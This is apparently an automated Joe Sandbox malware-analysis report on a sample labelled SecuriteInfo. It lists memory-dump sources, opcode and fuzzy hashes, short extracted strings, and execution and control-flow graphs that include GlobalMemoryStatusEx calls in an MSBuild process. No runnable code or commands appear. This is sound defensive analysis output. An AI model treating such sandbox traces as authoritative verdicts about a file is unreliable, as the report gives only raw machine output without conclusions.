                                                                                                  • Instruction Fuzzy Hash: 842187755093808FD713CF64D594715BFB1EF46214F28C5DAD8898F667C33A980ACB62
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                  • Instruction ID: 6eb09e4e2430c00a4145f6cf1c94fbaf15ac1812ab47ebaa1efc96fabe78c5b2
                                                                                                  • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                  • Instruction Fuzzy Hash: A021CD76404280EFDB46CF54D9C4B16BFB2FB88314F24C2AADD480B256C33AD426CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                  • Instruction ID: e9b7a13a3dd86889fd0ee28b763c69e3b9a896f5e4261e56235d0ce746acbf7b
                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                  • Instruction Fuzzy Hash: 6D11DF76404240CFCB52CF54D5C4B16BFA2FB98314F24C6AADC490B256C336D45ACBA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661379702.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_106d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                  • Instruction ID: ce8749d37bc54293675eafdd0c57fd6d5675b202967b226c0cee4b18bf346b68
                                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                  • Instruction Fuzzy Hash: EC11DD75604280CFDB02CF58D5C4B15BFB1FB84318F28C6AAD8894B256C33AD40ACB61
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c5f5fcf8e47572370f2a3ad26918573e51fd5fdfc558670944fbf03f64e00f6b
                                                                                                  • Instruction ID: b17dd0450b8fffce8ac5ce1c66914bd3c22149b739c54720844ea7a71ccc4b18
                                                                                                  • Opcode Fuzzy Hash: c5f5fcf8e47572370f2a3ad26918573e51fd5fdfc558670944fbf03f64e00f6b
                                                                                                  • Instruction Fuzzy Hash: 020126710083409AE7918F6ACD8476BFFE9EF81724F08C46BED894A286C238D840C7B1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661325758.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_105d000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5c219c0ba9f040f72dd35d53728a37cfd76fcf1ae8c6b11edb6d932e3f2d1f90
                                                                                                  • Instruction ID: 9c0a8e0c62372c837cde7b215a1f703d55b7c6860ffefc8d6c5041860a80c4b8
                                                                                                  • Opcode Fuzzy Hash: 5c219c0ba9f040f72dd35d53728a37cfd76fcf1ae8c6b11edb6d932e3f2d1f90
                                                                                                  • Instruction Fuzzy Hash: 00F062714043449AE7518B1AD8C4B67FFE8EB85628F18C45AED884A286C2799844CB71
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y5?>
                                                                                                  • API String ID: 0-744394712
                                                                                                  • Opcode ID: 63f049c24bb7e7dd38ee9a04ebe0693b8c450f62d8a08e88739b4daa315fc072
                                                                                                  • Instruction ID: 83b46f402ec04fe8e289ba19f249ee4821a833fd182085e4247d48ea805a8747
                                                                                                  • Opcode Fuzzy Hash: 63f049c24bb7e7dd38ee9a04ebe0693b8c450f62d8a08e88739b4daa315fc072
                                                                                                  • Instruction Fuzzy Hash: 4E610574E056099FCF08CFA9C9904DEFBF2FF89214F24946AD415BB224D334AA41CB65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y5?>
                                                                                                  • API String ID: 0-744394712
                                                                                                  • Opcode ID: 4d5de2076aec1cc1c12f4f21a76cbbb148b771f16b4d59771c38590358926bce
                                                                                                  • Instruction ID: bfdf94d27e3942ba394a8cdc35ef46e5ea5ae378c1670cdb430a9c88e6eb2069
                                                                                                  • Opcode Fuzzy Hash: 4d5de2076aec1cc1c12f4f21a76cbbb148b771f16b4d59771c38590358926bce
                                                                                                  • Instruction Fuzzy Hash: C971F4B4E056099FCF08CFA9C9805DEFBF2BF89214F25942AD415BB214D734AA41CF65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Z{)}
                                                                                                  • API String ID: 0-3080856833
                                                                                                  • Opcode ID: fea24ba9e4c22bb6d89a635152b98995ab38d3cba3f6351535fb59ca0239f505
                                                                                                  • Instruction ID: ace190e9171c35be2f41c17d416da0c0bd9658d723b154499f2fe440498fcb0b
                                                                                                  • Opcode Fuzzy Hash: fea24ba9e4c22bb6d89a635152b98995ab38d3cba3f6351535fb59ca0239f505
                                                                                                  • Instruction Fuzzy Hash: 4C6107B4E11209DFCB08CFA9D4849EEFBB2FB88310F148565E525AB315D7349A81CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4'^q
                                                                                                  • API String ID: 0-1614139903
                                                                                                  • Opcode ID: 2f35e6e15e468c5553002ca72f787d953025602f56a492b276874e600a8eb8f2
                                                                                                  • Instruction ID: 9cdefecf40ed5f2d64b02deb90370b34f3e7d2a60ad03081e92a19c6211bfd27
                                                                                                  • Opcode Fuzzy Hash: 2f35e6e15e468c5553002ca72f787d953025602f56a492b276874e600a8eb8f2
                                                                                                  • Instruction Fuzzy Hash: 8361D670E026099FDB48DF7AE98169EBBF2FB88304F14D539D4049B368EB785945CB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Z{)}
                                                                                                  • API String ID: 0-3080856833
                                                                                                  • Opcode ID: 639d7e276b3853830d372350d8c525d6dff5bb7b35093cf187da74f8bc78ba30
                                                                                                  • Instruction ID: d1c8bb58d7656cac677cf3bc0faa0dd9688f07dca2bebc98c74adcd8b613e7fb
                                                                                                  • Opcode Fuzzy Hash: 639d7e276b3853830d372350d8c525d6dff5bb7b35093cf187da74f8bc78ba30
                                                                                                  • Instruction Fuzzy Hash: 15512974E10209DFCB08CFA9D4849EEFBB2FB88310F158166E525A7355D734AA81CF95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !#!3
                                                                                                  • API String ID: 0-814652171
                                                                                                  • Opcode ID: 9a5fca8ae56aa5695d0877be15e9dbd89401f18bed7bc26d54d6ac9e49ce52a4
                                                                                                  • Instruction ID: 065571617bcd1f1d87a7459768babe9f0cff99ea467aad0a0ea67b4d8c6d552b
                                                                                                  • Opcode Fuzzy Hash: 9a5fca8ae56aa5695d0877be15e9dbd89401f18bed7bc26d54d6ac9e49ce52a4
                                                                                                  • Instruction Fuzzy Hash: 0F518D70E112199FDF18CFAAE980A9EFBB2FF88210F10D169D519EB254DB305A458F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !#!3
                                                                                                  • API String ID: 0-814652171
                                                                                                  • Opcode ID: 17a765e2ee59582293995d9efb819f22d9c9063d6f656797fc35a7ef090a5326
                                                                                                  • Instruction ID: 2639a4c1c8e4dd5ee7e0f2c199383c815f5b77c7c30572d8cebec3d47f4d49b5
                                                                                                  • Opcode Fuzzy Hash: 17a765e2ee59582293995d9efb819f22d9c9063d6f656797fc35a7ef090a5326
                                                                                                  • Instruction Fuzzy Hash: E2516E70E152199FDF1CCFAADA80A9EFBF2BF88200F14D16AD419EB254DB305A458F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: EaL
                                                                                                  • API String ID: 0-605704588
                                                                                                  • Opcode ID: bbc58eb2b705a7cbfa4aed67926d98e2e6dda9fe009ac2bffab42be21e172816
                                                                                                  • Instruction ID: 5e3d323fce527eb72474978060577424891c72e846ff04937b6bb285b870cffa
                                                                                                  • Opcode Fuzzy Hash: bbc58eb2b705a7cbfa4aed67926d98e2e6dda9fe009ac2bffab42be21e172816
                                                                                                  • Instruction Fuzzy Hash: 9B410570E0520ADFCB48CFA9C5815AEFBB2FF89310F25D46AC815E7254E7349A41CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: EaL
                                                                                                  • API String ID: 0-605704588
                                                                                                  • Opcode ID: 8032f41aed3cea23c3619d169b15cef642a0c2c17f31c3df6c85e778ce64a76c
                                                                                                  • Instruction ID: e99078aa477c1295ada3eb231a9f9984b0d5716d995a7c7e7f335bf0cc5f4ecb
                                                                                                  • Opcode Fuzzy Hash: 8032f41aed3cea23c3619d169b15cef642a0c2c17f31c3df6c85e778ce64a76c
                                                                                                  • Instruction Fuzzy Hash: 5B41E5B0E0560ADFCF48CFA9C5815AEFBF2EF88310F24D46AC515A7254E7349A41CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ~,^
                                                                                                  • API String ID: 0-3235009393
                                                                                                  • Opcode ID: d14b89752bf350ed853465cbca1c6580b9dca69039d81795500a551be85021af
                                                                                                  • Instruction ID: 183ead946502d747a31e6dde7a68a0bc956ae702b6f0267cff9bbee34fba8eee
                                                                                                  • Opcode Fuzzy Hash: d14b89752bf350ed853465cbca1c6580b9dca69039d81795500a551be85021af
                                                                                                  • Instruction Fuzzy Hash: 6141D6B4E0460ADFDF48CFAAC5415AEFBF2AB89300F14D42AC525B7254E7349A41CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ~,^
                                                                                                  • API String ID: 0-3235009393
                                                                                                  • Opcode ID: 05d03168cf05b38f56c7834a8c3969e30bf891d03978aa72ee78199a72d4992d
                                                                                                  • Instruction ID: 0a743b347e96a8733d87d81e6db98da1f326a0aba12315f3399ed9767a2fade6
                                                                                                  • Opcode Fuzzy Hash: 05d03168cf05b38f56c7834a8c3969e30bf891d03978aa72ee78199a72d4992d
                                                                                                  • Instruction Fuzzy Hash: 0441E9B5E0460A9FCF48CFAAC5415AEFBF2EF88300F14D42AC525A7254E7349A41CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: p
                                                                                                  • API String ID: 0-2181537457
                                                                                                  • Opcode ID: 6365f01d4008681eeb24d4fe7e6f50f78d7c932f3506047bcfa8458eebbc54ee
                                                                                                  • Instruction ID: 41d50f688001a8ba6f1137488822f74d820c9cb40e08ca4158e46a463cc562a1
                                                                                                  • Opcode Fuzzy Hash: 6365f01d4008681eeb24d4fe7e6f50f78d7c932f3506047bcfa8458eebbc54ee
                                                                                                  • Instruction Fuzzy Hash: E4119C71E006188BEB5CCF6BD84469EFAF3AFC8300F08C17AD818A6268DB3415568F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 10af50ce8b06069ebd9a2c1ca1093ac2b7c048fa49fb4dd10352893c589d972b
                                                                                                  • Instruction ID: 93ff720d52234a2b737a1bede1b9cfe2f9c01c410f7fcf81920890f2237e5ddf
                                                                                                  • Opcode Fuzzy Hash: 10af50ce8b06069ebd9a2c1ca1093ac2b7c048fa49fb4dd10352893c589d972b
                                                                                                  • Instruction Fuzzy Hash: F971D3B4E01209CFCF08CFA9C5809AEFBB2FF89310F199556D525A7215D734A982CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bdb6989b2a145ba6fc552e1bdb137fcb18c7f7badd22581e8b72e88c5308580f
                                                                                                  • Instruction ID: b8389173384c0c42fc6d977cedfac167bdcbc804d37a88e922125a2b688d4d0f
                                                                                                  • Opcode Fuzzy Hash: bdb6989b2a145ba6fc552e1bdb137fcb18c7f7badd22581e8b72e88c5308580f
                                                                                                  • Instruction Fuzzy Hash: 5861E774E0124A8FCF08CFA9C5808AEFBB2FF89310F198556D525A7215D734A982CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 230505dab90abb52ea5db9a5c2aab47e2793ac4ce7025d9f67131b607e21a33c
                                                                                                  • Instruction ID: 6e737782eb363fa4f4a238c1498b1efd4f1a93d7bf31690f2d8bf1235f340b2e
                                                                                                  • Opcode Fuzzy Hash: 230505dab90abb52ea5db9a5c2aab47e2793ac4ce7025d9f67131b607e21a33c
                                                                                                  • Instruction Fuzzy Hash: 904180B0E16319DFCF1CCF99EA80A9EB7B2FF88200F149569E525EB254D7309A448B11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1d4de735044ff3f5e99ba4aaad43edd06b6f2fbe962f4d788f7d335e06ab2ddc
                                                                                                  • Instruction ID: 29969e7deea965508c4793b0afc6a8f433dbb0c6f25b83f1b3d30f2c13739547
                                                                                                  • Opcode Fuzzy Hash: 1d4de735044ff3f5e99ba4aaad43edd06b6f2fbe962f4d788f7d335e06ab2ddc
                                                                                                  • Instruction Fuzzy Hash: F4417D71E116188BEB2CCF6B9D4529EFAF3BFC8300F14C1BA951CA6214EB340A858F11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 70979bfe849ee63173eb8e8da7a9ed84af528b390ab3edf142fde65f6c852609
                                                                                                  • Instruction ID: 11058e427be7b190881be0ab6eab93667aa122c8a9a775336eabc0fcf6176b0a
                                                                                                  • Opcode Fuzzy Hash: 70979bfe849ee63173eb8e8da7a9ed84af528b390ab3edf142fde65f6c852609
                                                                                                  • Instruction Fuzzy Hash: CB413F71E116588BEB5CCF6B8D4568EFAF3BFC8300F14C1BA951CA6254EB344A858F11
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 11728504f96fadd8518272bde2743b48e557116bd6bb758e21e9a77128f67274
                                                                                                  • Instruction ID: eca22b3c3ac4bde9ec6606590f34fc20deefae9e7b27b456c09d013d3d83578c
                                                                                                  • Opcode Fuzzy Hash: 11728504f96fadd8518272bde2743b48e557116bd6bb758e21e9a77128f67274
                                                                                                  • Instruction Fuzzy Hash: D0310C71E006189BEB58CF6BD840A9EFBB3BFC9300F14C0AAD418AB254DB305A458F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: be11ff5d1fdfde70cb8c3b0f44e5b40558377b9a3ef82a746f0d0014841dbbef
                                                                                                  • Instruction ID: 3883314e31d2c1fc64d924f0a35979edfa855945efd7cf3bd52e0bf89d821b4e
                                                                                                  • Opcode Fuzzy Hash: be11ff5d1fdfde70cb8c3b0f44e5b40558377b9a3ef82a746f0d0014841dbbef
                                                                                                  • Instruction Fuzzy Hash: 1D21FFB1E056189BEB58CFABD94069EFAF3AFC9300F04C0BAD518AB254EB3009458F51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:11%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:17
                                                                                                  Total number of Limit Nodes:4
                                                                                                  execution_graph 23713 1200848 23715 120084e 23713->23715 23714 120091b 23715->23714 23717 1201380 23715->23717 23719 1201396 23717->23719 23718 1201480 23718->23715 23719->23718 23721 1207eb0 23719->23721 23722 1207eba 23721->23722 23725 1207ed4 23722->23725 23726 65efa3a 23722->23726 23730 65efa48 23722->23730 23725->23719 23727 65efa5d 23726->23727 23728 65efc72 23727->23728 23729 65efc89 GlobalMemoryStatusEx GlobalMemoryStatusEx 23727->23729 23728->23725 23729->23727 23732 65efa5d 23730->23732 23731 65efc72 23731->23725 23732->23731 23733 65efc89 GlobalMemoryStatusEx GlobalMemoryStatusEx 23732->23733 23733->23732

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 128 65e3058-65e3079 129 65e307b-65e307e 128->129 130 65e3084-65e30a3 129->130 131 65e3833-65e3836 129->131 140 65e30bc-65e30c6 130->140 141 65e30a5-65e30a8 130->141 132 65e385c-65e385e 131->132 133 65e3838-65e3857 131->133 134 65e3865-65e3868 132->134 135 65e3860 132->135 133->132 134->129 137 65e386e-65e3877 134->137 135->134 145 65e30cc-65e30db 140->145 141->140 143 65e30aa-65e30ba 141->143 143->145 256 65e30dd call 65e3888 145->256 257 65e30dd call 65e3885 145->257 147 65e30e2-65e30e4 148 65e30e6-65e30ec 147->148 149 65e30f1-65e33ce 147->149 148->137 170 65e33d4-65e3483 149->170 171 65e3825-65e3832 149->171 180 65e34ac 170->180 181 65e3485-65e34aa 170->181 183 65e34b5-65e34c5 180->183 181->183 185 65e380c-65e3818 183->185 186 65e34cb-65e34ea 183->186 185->170 187 65e381e 185->187 186->185 189 65e34f0-65e34fa 186->189 187->171 189->185 190 65e3500-65e350b 189->190 190->185 191 65e3511-65e35e7 190->191 203 65e35e9-65e35eb 191->203 204 65e35f5-65e3625 191->204 203->204 208 65e3627-65e3629 204->208 209 65e3633-65e363f 204->209 208->209 210 65e36a5-65e36c0 209->210 211 65e3641-65e3645 209->211 214 65e37fd-65e3806 210->214 215 65e36c6-65e3702 210->215 211->210 212 65e3647-65e3671 211->212 221 65e367f-65e369e 212->221 222 65e3673-65e3675 212->222 214->185 214->191 227 65e3704-65e3706 215->227 228 65e3710-65e371e 215->228 221->215 226 65e36a0 221->226 222->221 226->214 227->228 230 65e3735-65e3740 228->230 231 65e3720-65e372b 228->231 235 65e3758-65e3769 230->235 236 65e3742-65e3748 230->236 231->230 234 65e372d 231->234 234->230 240 65e376b-65e3771 235->240 241 65e3781-65e378d 235->241 237 65e374c-65e374e 236->237 238 65e374a 236->238 237->235 238->235 242 65e3775-65e3777 240->242 243 65e3773 240->243 245 65e378f-65e3795 241->245 246 65e37a5-65e37f6 241->246 242->241 243->241 247 65e3799-65e379b 245->247 248 65e3797 245->248 246->214 247->246 248->246 256->147 257->147
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                  • API String ID: 0-2392861976
                                                                                                  • Opcode ID: 7d3c0b6c7c287e50a5db0c0d19d67a4d6692ec09abf448ab4227ddb4ecaa38ab
                                                                                                  • Instruction ID: 2efa75f846692bd0673f0afa74f1373bbb2041575995b48a2ef883756fb54162
                                                                                                  • Opcode Fuzzy Hash: 7d3c0b6c7c287e50a5db0c0d19d67a4d6692ec09abf448ab4227ddb4ecaa38ab
                                                                                                  • Instruction Fuzzy Hash: 99323F31E1075A8FCB58EF74C95469DB7B6BFC9300F1186A9D409AB254EF30A985CF81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
